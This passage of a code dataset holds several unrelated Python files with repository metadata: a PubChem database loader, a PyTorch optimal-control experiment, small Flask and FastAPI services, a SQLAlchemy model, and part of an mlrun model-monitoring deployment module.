    sql_create_table = f"CREATE TABLE {table_name} ({str_column_names})"
    execute_sql(conn, sql_drop_table)
    execute_sql(conn, sql_create_table)
    logging.info("Table created %s ", table_name)
def bulk_insert(conn, data, file_name):
    """Insert a batch of row tuples into the table derived from ``file_name``.

    :param conn: Open database connection.
    :param data: List of row tuples; must contain at least one row.
    :param file_name: Source file name; mapped to table/columns via added_col_dic.
    """
    with conn.cursor() as cur:
        table_name = file_name.replace("-", "_").upper()
        columns = added_col_dic[file_name]
        column_list = ", ".join(columns)
        # One "%s" placeholder per row; psycopg2 adapts each Python tuple in
        # ``data`` to a parenthesised SQL record, so the statement becomes
        # "insert into T (cols) values (...), (...), ...".
        records_list_template = ",".join(["%s"] * len(data))
        # NOTE(review): with an empty ``data`` list this renders "values ;",
        # which is invalid SQL — callers must not pass an empty batch.
        insert_query = "insert into {table_name} ({columns}) values {};".format(
            records_list_template, table_name=table_name, columns=column_list
        )
        cur.execute(insert_query, data)
    conn.commit()
def create_indexes(conn, table_name, create_gin):
    """Create the CID index on the table, plus a trigram GIN index when asked.

    ``table_name`` is the source file name; ``create_gin`` enables the
    substring-search index on the table's main (second) column.
    """
    upper_cols = [c.upper() for c in added_col_dic[table_name]]
    main_column = upper_cols[1].lower()
    table_name = table_name.replace("-", "_").lower()
    if create_gin:
        logging.info("Start creating indexes")
        # The trigram GIN index accelerates LIKE/ILIKE substring search.
        execute_sql(conn, "CREATE EXTENSION IF NOT EXISTS pg_trgm;")
        execute_sql(conn, f"CREATE INDEX IF NOT EXISTS idx_gin_{table_name} ON {table_name} USING gin ({main_column} gin_trgm_ops);")
    execute_sql(conn, f"CREATE INDEX IF NOT EXISTS cid_idx_{table_name} ON {table_name} (CID);")
    logging.info("Finish creating indexes")
def get_line(file_name):
    """Lazily yield each line (newline included) of ``file_name``."""
    with open(file_name) as handle:
        yield from handle
def go():
    """Load a tab-separated PubChem extras file (given as ``sys.argv[1]``).

    Streams the file line by line, batching ``chunksize`` rows per INSERT
    into the table named after the file, then builds indexes (GIN-indexed
    tables additionally get a trigram index).
    """
    logging.info(f"Connecting with string: {conn_string}")
    conn = psycopg2.connect(conn_string)
    file = sys.argv[1]
    file_name = os.path.basename(file)
    logging.info(f"Populating table using file {file_name}")
    # Raises KeyError for unknown files; the previous dead pandas-style
    # ``types``/``column_name`` locals were removed.
    column_names = added_col_dic[file_name]
    gin_indexed = file_name in gin_indexes_tables
    create_table(conn, file_name)
    # CID-Title is the only extras file that is not UTF-8 encoded.
    encoding = "UTF-8"
    if file_name == "CID-Title":
        encoding = "Latin"
    chunksize = 200000
    # Some source lines carry trailing fields we do not store; keep only as
    # many fields as the target table has columns.
    column_slice_size = len(column_names)
    logging.info("Inserting...")
    record_counter = 0
    with open(file, "rb") as f:
        data = []
        for line in f:
            data.append(tuple(line.decode(encoding).replace("\n", "").split("\t")[:column_slice_size]))
            if len(data) == chunksize:
                with conn:
                    bulk_insert(conn, data, file_name)
                record_counter += chunksize
                if record_counter % 10000 == 0:
                    logging.info(f"Total number of records inserted: {record_counter}")
                data = []
        # Flush the final partial batch. Guard on a non-empty list: the old
        # ``len(data) != chunksize`` test also fired when the row count was an
        # exact multiple of chunksize, issuing an invalid zero-row INSERT.
        if data:
            with conn:
                bulk_insert(conn, data, file_name)
            record_counter += len(data)
            logging.info(f"Total number of records inserted: {record_counter}")
    logging.info("Inserting done...")
    create_indexes(conn, file_name, gin_indexed)
# Script entry point: ingest the file named in sys.argv[1].
go()
| MetaCell/asu-olfactory | applications/pub-chem-index/tasks/ingestion/populate_parallel.py | populate_parallel.py | py | 5,809 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "psycopg2.extensions.AsIs",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "psycopg2.extensions.register_adapter",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.int64",
"line_number": 17,
"usage_type": "attribute"
},
{
"ap... |
19453685544 | # -*- coding: utf-8 -*-
"""
Jianyu Chen
This is a project for optimal control.
Python code for 1-dim double well system
"""
#%%
import torch
from torch import nn
from torch.nn import functional as F
import math
import numpy as np
import matplotlib.pyplot as plt
#%%
# Time grid: 100 steps of 0.01 covering [0, 0.99].
t = np.arange(100) * 0.01
print(t)
sigma = 1
#%%
# Initial control guess: small Gaussian noise, one value per time step.
u= np.random.normal(0, 0.008, 100)
#u = np.linspace(0, 1, 100)
print(u)
# NOTE(review): sigma is re-assigned the same value here; harmless duplicate.
sigma = 1
def runge_kutta(x, t, dt, f, u, i):
    """Advance x by one Heun (RK2) step of x' = f(x, t) + u.

    x: current state value
    t: current time
    dt: time step
    f: drift term, called as f(x, t)
    u: control sequence, sampled at indices i and i + 1
    i: index of the current time step
    """
    k_first = dt * (f(x, t) + u[i])
    k_second = dt * (f(x + k_first, t + dt) + u[i + 1])
    return x + (k_first + k_second) / 2.
def get_x(u):
    """Integrate the controlled double-well state forward in time.

    Starts from x(0) = -1 and takes 99 steps of size 0.01 under the drift
    x - x**3 plus control ``u``, returning the float32 trajectory of length
    100 (initial value included).

    NOTE(review): this calls the module-level ``runge_kutta``, which is
    redefined later in the script with adjoint semantics — verify which
    version is in scope when this runs.
    """
    dt = 0.01
    state = -1.
    time_now = 0.
    trajectory = [state]
    def drift(x, t):
        return x-x**3
    for step in range(99):
        state = runge_kutta(state, time_now, dt, drift, u, step)
        time_now += dt
        trajectory.append(state)
    return np.array([np.float32(val) for val in trajectory])
#%%
import math
import numpy as np
import matplotlib.pyplot as plt
def runge_kutta(p, t, dt, f, xs, i):
    """One backward Heun (RK2) step of the adjoint (costate) equation.

    p: current costate value
    t: current time
    dt: time step in t (the step is taken backwards in time)
    f: costate function, called as f(p, t)
    xs: state trajectory the adjoint is linearised around
    i: index of the current (later) step; i - 1 is the earlier one
    """
    first_increment = -dt * (f(p, t) * (3 * xs[i] ** 2 - 1) - 3 * xs[i])
    second_increment = -dt * (f(p + first_increment, t + dt) * (3 * xs[i - 1] ** 2 - 1) - 3 * xs[i - 1])
    return p + (first_increment + second_increment) / 2.
def get_p(x):
    """Integrate the costate p backwards from its terminal condition.

    The terminal value comes from differentiating the terminal cost at
    x(T) = x[99]; the returned float32 array is in reverse-time order
    (terminal value first).
    """
    dt = 0.01
    time_now = 1.0
    costate = -2*(x[99]-1)/((x[99]-1)**2+1)**2
    values = [costate]
    def identity_rhs(p, t):
        return p
    for step in range(99, 0, -1):
        costate = runge_kutta(costate, time_now, dt, identity_rhs, x, step)
        time_now -= dt
        values.append(costate)
    return np.array([np.float32(v) for v in values])
#%%
class MLP(nn.Module):
    """Small 1-8-16-1 fully connected network mapping time t to control u(t)."""
    def __init__(self):
        # Parent constructor performs the required nn.Module bookkeeping.
        super().__init__()
        self.hidden1 = nn.Linear(1, 8)
        self.hidden2 = nn.Linear(8, 16)
        self.out = nn.Linear(16, 1)
    def forward(self, u):
        """Map input tensor ``u`` (shape [..., 1]) through two ReLU layers."""
        return self.out(F.relu(self.hidden2(F.relu(self.hidden1(u)))))
net = MLP()
#%%
# Initial forward/backward sweep: state trajectory x from the noisy control u,
# then the costate p integrated backwards.
t = torch.tensor(t)
t = t.to(torch.float32)
x = get_x(u)
p = get_p(x)
# get_p returns p in reverse-time order; flip it to forward-time order.
reversed_p = []
for i in reversed(p):
    reversed_p.append(i)
print(reversed_p)
p = reversed_p
x = torch.tensor(x).to(torch.float32)
p = torch.tensor(p).to(torch.float32)
#%%
print(x)
print(p)
#%%
import numpy as np
import matplotlib.pylab as plt
#from gradient import numerical_gradient
Loss = []
lr =0.05
epoch = 1000
N = 20  # outer PMP iteration count
# Terminal cost evaluated at the end of the current trajectory.
Q = 2*(x[99]-1)**2
print(Q)
dt = 0.01
# Finite-difference time derivatives of the state and costate trajectories.
dx= (x[1:]-x[0:-1])/dt
dp = (p[1:]-p[0:-1])/dt
rho = 1  # correction (penalty) coefficient
updater = torch.optim.SGD(net.parameters(), lr) # change to adaptive
print(dx.shape)
def train():
    """Run ``epoch`` SGD steps maximising the penalised Hamiltonian.

    Uses the module-level globals: net, t, x, p, dx, dp, sigma, rho, Q,
    updater and Loss. The control u is implicit via net(t).
    """
    for ii in range(epoch):
        H = 0
        for j in range(99):
            t_j = t[j].reshape(1)
            # Network output is the current control estimate u_hat(t_j).
            u_hat_j = net(torch.tensor(t_j))
            x_j = x[j].reshape(1)
            p_j = p[j].reshape(1)
            # Accumulate the Hamiltonian plus dynamics-residual penalties.
            # NOTE(review): the last penalty term is *added* with a plus sign
            # while the state-residual penalty is subtracted — confirm the
            # intended sign of the costate-residual term.
            H = H + p_j* (x_j-x_j**3+sigma*u_hat_j) - 0.5*(u_hat_j**2+1-3*x_j**2)-0.5*rho*(abs(dx[j]-x_j+x_j**3-sigma*u_hat_j)**2)+abs((dp[j]+p_j*(1-3*x_j**2)+3*x_j)**2)
        # Minimising l maximises H relative to the terminal cost Q.
        l = -(H-Q)/100 # l>0
        updater.zero_grad()
        l.backward()
        updater.step()
        Loss.append(l.detach().item())
    return
#%%
# Outer PMP loop: evaluate the learned control, re-integrate state/costate,
# then refit the control network against the updated trajectories.
for k in range(N):
    print(k)
    U = [net(torch.tensor(t_j.reshape(1))) for t_j in t]
    u_op = [u.detach().numpy() for u in U]
    #print(u_op)
    # Each network output is a length-1 array; flatten to a plain list.
    flatten_u_op = [element for sublist in u_op for element in sublist]
    print(flatten_u_op)
    x = get_x(flatten_u_op)
    p = get_p(x)
    # Flip p back to forward-time order before training.
    reversed_p = []
    for i in reversed(p):
        reversed_p.append(i)
    p = reversed_p
    x = torch.tensor(x).to(torch.float32)
    p = torch.tensor(p).to(torch.float32)
    train()
    print(x)
#%%
# Plot the final control signal over time.
x = t
y = flatten_u_op
#y = list(map(lambda x:x.detach().numpy(), y))
plt.title("optimal control")
plt.xlabel("Time")
plt.ylabel("u")
plt.plot(x, y)
plt.show()
#%%
# Final state trajectory under the optimised control.
x = get_x(y)
print(x)
#%%
import scipy.io as scio
scio.savemat('pathway_data.mat',{'x':x})
| Cecilia-ChenJY/PMP-for-Optimal-Control | double_well.py | double_well.py | py | 4,448 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.random.normal",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
... |
6530887784 | # FLASK: location API functions
from flask import Flask, jsonify, request
import pymysql
from __main__ import app
from helpers.location import *
from db_connect.db_connection import connect
# Open database connection once at import time; the handle and cursor are
# shared by every request (NOTE(review): a single module-level cursor is not
# safe under concurrent requests — consider per-request connections).
db = connect()
cursor = db.cursor()
# Look up locations (GET) or create a new location (POST).
@app.route("/location", methods=['GET','POST'])
def location():
    """GET: return locations matching the District/City/Country filters.
    POST: insert a new location (PostalCode plus filters) and report success.
    """
    # Retrieve optional filter parameters from the query string
    dist = request.args.get('District')
    city = request.args.get('City')
    country = request.args.get('Country')
    # Find locations
    if request.method == 'GET':
        # NOTE(review): get_location()/new_location() appear to build SQL from
        # raw request args — confirm they parameterise or escape the values to
        # avoid SQL injection.
        cursor.execute(get_location(dist, city, country))
        return jsonify(cursor.fetchall())
    # Create new location in database
    elif request.method == 'POST':
        pc = request.args.get('PostalCode')
        cursor.execute(new_location(pc, dist, city, country))
        db.commit()
        return jsonify("Success!")
| judgyknowitall/DataBaseProject | venvProject/apis/location_route.py | location_route.py | py | 897 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "db_connect.db_connection.connect",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 20,
"usage_type": "attribute"
},
{
"a... |
10858226319 | import uvicorn
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from sockets import sio_app
app = FastAPI()
# NOTE(review): mounting the Socket.IO ASGI app at the root path ("/") can
# shadow the HTTP routes declared below — verify the '/' GET route is actually
# reachable, or mount under a sub-path instead.
app.mount('/', app=sio_app)
# Allow all origins/methods/headers (development CORS policy).
app.add_middleware(
    CORSMiddleware,
    allow_origins=['*'],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
@app.get('/')
async def home():
    """Landing/health-check route returning a greeting payload."""
    return {'message': 'Hello👋 Developers💻'}
# Run with auto-reload when executed directly.
if __name__ == '__main__':
    uvicorn.run('main:app', reload=True)
| jrdeveloper124/socketio-app | server/main.py | main.py | py | 468 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sockets.sio_app",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "fastapi.middleware.cors.CORSMiddleware",
"line_number": 10,
"usage_type": "argument"
},
{
"api_name... |
37949950597 | #!/usr/bin/python3
"""This module defines the class Place that inherits from class BaseModel"""
from models.base_model import BaseModel, Base
from sqlalchemy import Column, String, Integer, Float, ForeignKey
from sqlalchemy.orm import relationship
from sqlalchemy.sql.schema import Table
import os
if os.getenv('HBNB_TYPE_STORAGE') == 'db':
    # Association table for the many-to-many Place <-> Amenity link; the two
    # foreign keys form a composite primary key.
    place_amenity = Table('place_amenity',
                          Base.metadata,
                          Column('place_id',
                                 String(60),
                                 ForeignKey('places.id'),
                                 primary_key=True,
                                 nullable=False),
                          Column('amenity_id',
                                 String(60),
                                 ForeignKey('amenities.id'),
                                 primary_key=True,
                                 nullable=False))
class Place(BaseModel, Base):
    """Represents a place/lodging listing.

    With database storage (HBNB_TYPE_STORAGE == 'db') the attributes are
    SQLAlchemy mapped columns/relationships; otherwise they are plain class
    attributes and the reviews/amenities links are resolved through
    FileStorage via the properties below.
    """
    __tablename__ = 'places'
    if os.getenv('HBNB_TYPE_STORAGE') == 'db':
        city_id = Column(String(60), ForeignKey('cities.id'), nullable=False)
        user_id = Column(String(60), ForeignKey('users.id'), nullable=False)
        name = Column(String(128), nullable=False)
        description = Column(String(1024), nullable=False)
        number_rooms = Column(Integer, nullable=False, default=0)
        number_bathrooms = Column(Integer, nullable=False, default=0)
        max_guest = Column(Integer, nullable=False, default=0)
        price_by_night = Column(Integer, nullable=False, default=0)
        latitude = Column(Float, nullable=True)
        longitude = Column(Float, nullable=True)
        reviews = relationship('Review', backref='place',
                               cascade='all, delete, delete-orphan')
        amenities = relationship('Amenity', backref='place_amenities',
                                 secondary=place_amenity, viewonly=False)
    else:
        city_id = ""
        user_id = ""
        name = ""
        description = ""
        number_rooms = 0
        number_bathrooms = 0
        max_guest = 0
        price_by_night = 0
        latitude = 0.0
        longitude = 0.0
        amenity_ids = []

    # NOTE(review): the properties below are defined unconditionally, so in
    # db mode they shadow the SQLAlchemy relationships declared above —
    # confirm this matches the intended storage behaviour.
    @property
    def reviews(self):
        """Return the Review instances whose place_id matches this place."""
        from models import storage
        from models.review import Review
        review_of_place = []
        review_dict = storage.all(Review)
        for obj in review_dict.values():
            if obj.place_id == self.id:
                review_of_place.append(obj)
        return review_of_place

    @property
    def amenities(self):
        """Return the Amenity instances listed in self.amenity_ids."""
        from models import storage
        from models.amenity import Amenity
        amenities_of_place = []
        amenity_dict = storage.all(Amenity)
        for obj in amenity_dict.values():
            if obj.id in self.amenity_ids:
                amenities_of_place.append(obj)
        return amenities_of_place

    @amenities.setter
    def amenities(self, obj):
        """Link an Amenity to this place by appending its id."""
        # Import locally (as the getter does): Amenity was otherwise not in
        # scope here, so the original type comparison raised NameError.
        from models.amenity import Amenity
        if type(obj) != Amenity:
            return
        if obj.id not in self.amenity_ids:
            self.amenity_ids.append(obj.id)

    def __init__(self, *args, **kwargs):
        """Initializes the attributes of the class"""
        super().__init__(*args, **kwargs)
| Chiemelie10/AirBnB_Practice_v2 | models/place.py | place.py | py | 3,794 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getenv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.sql.schema.Table",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "models.base_model.Base.metadata",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_na... |
22354032685 | import pathlib
import typing
import sqlalchemy.orm
from fastapi import Depends
import mlrun.common.schemas.model_monitoring
import mlrun.common.schemas.model_monitoring.constants as mm_constants
import mlrun.model_monitoring.stream_processing
import mlrun.model_monitoring.tracking_policy
import server.api.api.endpoints.functions
import server.api.api.utils
import server.api.crud.model_monitoring.helpers
import server.api.utils.scheduler
import server.api.utils.singletons.k8s
from mlrun import feature_store as fstore
from mlrun.model_monitoring.writer import ModelMonitoringWriter
from mlrun.utils import logger
from server.api.api import deps
from server.api.crud.model_monitoring.helpers import Seconds, seconds2minutes
# Repository-relative paths to the model-monitoring source files that get
# packaged into the functions deployed below.
_MODEL_MONITORING_COMMON_PATH = (
    pathlib.Path(__file__).parents[4] / "mlrun" / "model_monitoring"
)
_STREAM_PROCESSING_FUNCTION_PATH = (
    _MODEL_MONITORING_COMMON_PATH / "stream_processing.py"
)
_MONITORING_ORIGINAL_BATCH_FUNCTION_PATH = _MODEL_MONITORING_COMMON_PATH / "batch.py"
_MONITORING_APPLICATION_CONTROLLER_FUNCTION_PATH = (
    _MODEL_MONITORING_COMMON_PATH / "controller_handler.py"
)
_MONITORING_WRITER_FUNCTION_PATH = _MODEL_MONITORING_COMMON_PATH / "writer.py"
class MonitoringDeployment:
def __init__(
self,
parquet_batching_max_events: int = mlrun.mlconf.model_endpoint_monitoring.parquet_batching_max_events,
max_parquet_save_interval: int = mlrun.mlconf.model_endpoint_monitoring.parquet_batching_timeout_secs,
) -> None:
self._parquet_batching_max_events = parquet_batching_max_events
self._max_parquet_save_interval = max_parquet_save_interval
"""
Initialize a MonitoringDeployment object, which handles the deployment & scheduling of:
1. model monitoring stream
2. model monitoring batch
3. model monitoring batch application
4. model monitoring writer
:param parquet_batching_max_events: Maximum number of events that will be used for writing the monitoring
parquet by the monitoring stream function.
:param max_parquet_save_interval: Maximum number of seconds to hold events before they are written to the
monitoring parquet target. Note that this value will be used to handle the
offset by the scheduled batch job.
"""
    def deploy_monitoring_functions(
        self,
        project: str,
        model_monitoring_access_key: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
    ):
        """
        Deploy the model monitoring stream function and schedule the batch job.

        :param project:                     The name of the project.
        :param model_monitoring_access_key: Access key to apply the model monitoring process.
        :param db_session:                  A session that manages the current dialog with the database.
        :param auth_info:                   The auth info of the request.
        :param tracking_policy:             Model monitoring configurations.
        """
        self.deploy_model_monitoring_stream_processing(
            project=project,
            model_monitoring_access_key=model_monitoring_access_key,
            db_session=db_session,
            auth_info=auth_info,
            tracking_policy=tracking_policy,
        )
        # The batch job is offset by the parquet flush interval so it only
        # processes events that the stream has already persisted.
        self.deploy_model_monitoring_batch_processing(
            project=project,
            model_monitoring_access_key=model_monitoring_access_key,
            db_session=db_session,
            auth_info=auth_info,
            tracking_policy=tracking_policy,
            tracking_offset=Seconds(self._max_parquet_save_interval),
            function_name=mm_constants.MonitoringFunctionNames.BATCH,
        )
    def deploy_model_monitoring_stream_processing(
        self,
        project: str,
        model_monitoring_access_key: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
    ) -> None:
        """
        Deploy the model monitoring stream real-time nuclio function (a no-op
        if it is already deployed). The goal of this real time function is
        to monitor the log of the data stream. It is triggered when a new log entry is detected.
        It processes the new events into statistics that are then written to statistics databases.

        :param project:                     The name of the project.
        :param model_monitoring_access_key: Access key to apply the model monitoring process.
        :param db_session:                  A session that manages the current dialog with the database.
        :param auth_info:                   The auth info of the request.
        :param tracking_policy:             Model monitoring configurations.
        """
        logger.info(
            "Checking if model monitoring stream is already deployed",
            project=project,
        )
        try:
            # validate that the model monitoring stream has not yet been deployed
            # NOTE(review): the name literal "model-monitoring-stream" is
            # hardcoded here — confirm it matches mm_constants.
            mlrun.runtimes.function.get_nuclio_deploy_status(
                name="model-monitoring-stream",
                project=project,
                tag="",
                auth_info=auth_info,
            )
            logger.info(
                "Detected model monitoring stream processing function already deployed",
                project=project,
            )
            return
        except mlrun.errors.MLRunNotFoundError:
            logger.info(
                "Deploying model monitoring stream processing function", project=project
            )
        # Get parquet target value for model monitoring stream function
        parquet_target = (
            server.api.crud.model_monitoring.helpers.get_monitoring_parquet_path(
                db_session=db_session, project=project
            )
        )
        fn = self._initial_model_monitoring_stream_processing_function(
            project=project,
            model_monitoring_access_key=model_monitoring_access_key,
            tracking_policy=tracking_policy,
            auth_info=auth_info,
            parquet_target=parquet_target,
        )
        # Adding label to the function - will be used to identify the stream pod
        fn.metadata.labels = {"type": "model-monitoring-stream"}
        server.api.api.endpoints.functions._build_function(
            db_session=db_session,
            auth_info=auth_info,
            function=fn,
        )
    def deploy_model_monitoring_controller(
        self,
        project: str,
        model_monitoring_access_key: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
    ) -> typing.Union[mlrun.runtimes.kubejob.KubejobRuntime, None]:
        """
        Submit model monitoring application controller job along with deploying the model monitoring writer function.
        While the main goal of the controller job is to handle the monitoring processing and triggering applications,
        the goal of the model monitoring writer function is to write all the monitoring application results to the
        databases. Note that the default scheduling policy of the controller job is to run every 5 min.

        :param project:                     The name of the project.
        :param model_monitoring_access_key: Access key to apply the model monitoring process.
        :param db_session:                  A session that manages the current dialog with the database.
        :param auth_info:                   The auth info of the request.
        :param tracking_policy:             Model monitoring configurations, including the required controller
                                            configurations such as the base period (5 minutes by default) and
                                            the default controller image (`mlrun/mlrun` by default).

        :return: Model monitoring controller job as a runtime function, or None if already scheduled.
        """
        # The writer must exist before the controller so application results
        # have somewhere to be written.
        self.deploy_model_monitoring_writer_application(
            project=project,
            model_monitoring_access_key=model_monitoring_access_key,
            db_session=db_session,
            auth_info=auth_info,
            tracking_policy=tracking_policy,
        )
        return self.deploy_model_monitoring_batch_processing(
            project=project,
            model_monitoring_access_key=model_monitoring_access_key,
            db_session=db_session,
            auth_info=auth_info,
            tracking_policy=tracking_policy,
            function_name=mm_constants.MonitoringFunctionNames.APPLICATION_CONTROLLER,
        )
    def deploy_model_monitoring_batch_processing(
        self,
        project: str,
        model_monitoring_access_key: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
        with_schedule: bool = True,
        overwrite: bool = False,
        tracking_offset: Seconds = Seconds(0),
        function_name: str = mm_constants.MonitoringFunctionNames.BATCH,
    ) -> typing.Union[mlrun.runtimes.kubejob.KubejobRuntime, None]:
        """
        Deploying model monitoring batch job.
        The goal of this job is to identify drift in the data based on the latest batch of events. By default,
        this job is executed on the hour every hour.
        Note that if this job was already deployed then you will either have to pass overwrite=True or
        to delete the old job before deploying a new one.

        :param project:                     The name of the project.
        :param model_monitoring_access_key: Access key to apply the model monitoring process.
        :param db_session:                  A session that manages the current dialog with the database.
        :param auth_info:                   The auth info of the request.
        :param tracking_policy:             Model monitoring configurations.
        :param with_schedule:               If true, submit a scheduled batch drift job.
        :param overwrite:                   If true, overwrite the existing model monitoring batch job.
        :param tracking_offset:             Offset for the tracking policy (for synchronization with the stream)
        :param function_name:               model-monitoring-batch or model-monitoring-controller
                                            indicates which one to deploy.

        :return: Model monitoring batch job as a runtime function, or None if the schedule already exists.
        """
        job_valid_names = [
            mm_constants.MonitoringFunctionNames.BATCH,
            mm_constants.MonitoringFunctionNames.APPLICATION_CONTROLLER,
        ]
        if function_name not in job_valid_names:
            raise mlrun.errors.MLRunRuntimeError(
                f"Model Monitoring batch job can be only within {job_valid_names}"
            )
        fn = None
        if not overwrite:
            logger.info(
                f"Checking if {function_name.replace('-',' ')} processing function is already deployed",
                project=project,
            )
            # Try to list functions that named model monitoring batch
            # to make sure that this job has not yet been deployed
            try:
                fn = server.api.crud.Functions().get_function(
                    db_session=db_session,
                    name=function_name,
                    project=project,
                )
                logger.info(
                    f"Detected {function_name.replace('-',' ')} processing function already deployed",
                    project=project,
                )
            except mlrun.errors.MLRunNotFoundError:
                logger.info(
                    f"Deploying {function_name.replace('-',' ')} processing function ",
                    project=project,
                )
        if not fn:
            # Create a monitoring batch job function object
            fn = self._get_model_monitoring_batch_function(
                project=project,
                model_monitoring_access_key=model_monitoring_access_key,
                db_session=db_session,
                auth_info=auth_info,
                image=tracking_policy.default_batch_image
                if function_name == mm_constants.MonitoringFunctionNames.BATCH
                else tracking_policy.default_controller_image,
                function_name=function_name,
            )
        # Get the function uri
        function_uri = fn.save(versioned=True)
        if with_schedule:
            if not overwrite:
                try:
                    # If a schedule already exists, keep it and return early.
                    server.api.utils.scheduler.Scheduler().get_schedule(
                        db_session=db_session,
                        project=project,
                        name=function_name,
                    )
                    logger.info(
                        f"Already deployed {function_name.replace('-',' ')} scheduled job function ",
                        project=project,
                    )
                    return
                except mlrun.errors.MLRunNotFoundError:
                    logger.info(
                        f"Deploying {function_name.replace('-',' ')} scheduled job function ",
                        project=project,
                    )
            # Submit batch scheduled job
            self._submit_schedule_batch_job(
                project=project,
                function_uri=function_uri,
                db_session=db_session,
                auth_info=auth_info,
                tracking_policy=tracking_policy,
                tracking_offset=tracking_offset,
                function_name=function_name,
            )
        return fn
    def deploy_model_monitoring_writer_application(
        self,
        project: str,
        model_monitoring_access_key: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
    ):
        """
        Deploy the model monitoring writer real-time nuclio function (a no-op
        if it is already deployed). The goal of this real time function is
        to write all the monitoring application result to the databases. It is triggered by those applications.
        It processes and writes the result to the databases.

        :param project:                     The name of the project.
        :param model_monitoring_access_key: Access key to apply the model monitoring process.
        :param db_session:                  A session that manages the current dialog with the database.
        :param auth_info:                   The auth info of the request.
        :param tracking_policy:             Model monitoring configurations.
        """
        logger.info(
            "Checking if model monitoring writer is already deployed",
            project=project,
        )
        try:
            # validate that the model monitoring stream has not yet been deployed
            mlrun.runtimes.function.get_nuclio_deploy_status(
                name=mm_constants.MonitoringFunctionNames.WRITER,
                project=project,
                tag="",
                auth_info=auth_info,
            )
            logger.info(
                "Detected model monitoring writer processing function already deployed",
                project=project,
            )
            return
        except mlrun.errors.MLRunNotFoundError:
            logger.info(
                "Deploying model monitoring writer processing function", project=project
            )
        fn = self._initial_model_monitoring_writer_function(
            project=project,
            model_monitoring_access_key=model_monitoring_access_key,
            tracking_policy=tracking_policy,
            auth_info=auth_info,
        )
        # Adding label to the function - will be used to identify the stream pod
        fn.metadata.labels = {"type": "model-monitoring-writer"}
        server.api.api.endpoints.functions._build_function(
            db_session=db_session,
            auth_info=auth_info,
            function=fn,
        )
    def _initial_model_monitoring_stream_processing_function(
        self,
        project: str,
        model_monitoring_access_key: str,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
        auth_info: mlrun.common.schemas.AuthInfo,
        parquet_target: str,
    ):
        """
        Initialize model monitoring stream processing function.

        :param project:                     Project name.
        :param model_monitoring_access_key: Access key to apply the model monitoring process. Please note that in CE
                                            deployments this parameter will be None.
        :param tracking_policy:             Model monitoring configurations.
        :param auth_info:                   The auth info of the request.
        :param parquet_target:              Path to model monitoring parquet file that will be generated by the
                                            monitoring stream nuclio function.

        :return: A function object from a mlrun runtime class
        """
        # Initialize Stream Processor object
        stream_processor = (
            mlrun.model_monitoring.stream_processing.EventStreamProcessor(
                project=project,
                parquet_batching_max_events=self._parquet_batching_max_events,
                parquet_batching_timeout_secs=self._max_parquet_save_interval,
                parquet_target=parquet_target,
                model_monitoring_access_key=model_monitoring_access_key,
            )
        )
        # Create a new serving function for the streaming process
        function = mlrun.code_to_function(
            name="model-monitoring-stream",
            project=project,
            filename=str(_STREAM_PROCESSING_FUNCTION_PATH),
            kind="serving",
            image=tracking_policy.stream_image,
        )
        # Create monitoring serving graph
        stream_processor.apply_monitoring_serving_graph(function)
        # Set the project to the serving function
        function.metadata.project = project
        # Add stream triggers
        function = self._apply_stream_trigger(
            project=project,
            function=function,
            model_monitoring_access_key=model_monitoring_access_key,
            auth_info=auth_info,
        )
        # Apply feature store run configurations on the serving function
        run_config = fstore.RunConfig(function=function, local=False)
        function.spec.parameters = run_config.parameters
        return function
    def _get_model_monitoring_batch_function(
        self,
        project: str,
        model_monitoring_access_key: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        image: str,
        function_name: str = "model-monitoring-batch",
    ):
        """
        Initialize model monitoring batch function.

        :param project:                     project name.
        :param model_monitoring_access_key: access key to apply the model monitoring process. Please note that in CE
                                            deployments this parameter will be None.
        :param db_session:                  A session that manages the current dialog with the database.
        :param auth_info:                   The auth info of the request.
        :param image:                       Base docker image to use for building the function container
        :param function_name:               model-monitoring-batch or model-monitoring-controller
                                            indicates which one to create.

        :return: A function object from a mlrun runtime class
        """
        # The batch job and the controller share this builder; only the source
        # file and image differ.
        filename = (
            str(_MONITORING_ORIGINAL_BATCH_FUNCTION_PATH)
            if function_name == "model-monitoring-batch"
            else str(_MONITORING_APPLICATION_CONTROLLER_FUNCTION_PATH)
        )
        # Create job function runtime for the model monitoring batch
        function: mlrun.runtimes.KubejobRuntime = mlrun.code_to_function(
            name=function_name,
            project=project,
            filename=filename,
            kind="job",
            image=image,
            handler="handler",
        )
        function.set_db_connection(server.api.api.utils.get_run_db_instance(db_session))
